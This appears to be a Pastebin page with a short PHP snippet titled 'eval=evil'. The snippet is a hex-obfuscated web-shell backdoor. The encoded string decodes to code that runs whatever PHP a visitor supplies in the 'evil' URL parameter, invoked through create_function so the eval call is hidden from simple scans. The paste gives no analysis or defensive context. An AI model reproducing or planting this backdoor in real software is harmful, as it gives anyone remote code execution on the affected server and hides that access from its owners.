Advertisement
stuppid_bot

eval=evil

Oct 28th, 2013
153
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.28 KB | None | 0 0
  1. <?php
  2.  
  3. error_reporting(E_ALL);
  4. $x0 = "\x69\x66\x20\x28\x69\x73\x73\x65\x74\x28\x24\x5f\x47\x45\x54\x5b\x27\x65\x76\x69\x6c\x27\x5d\x29\x29\x20\x65\x76\x61\x6c\x28\x24\x5f\x47\x45\x54\x5b\x27\x65\x76\x69\x6c\x27\x5d\x29\x3b";
  5. $x1 = create_function('', $x0);
  6. $x1(); // eval($_GET['evil'])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement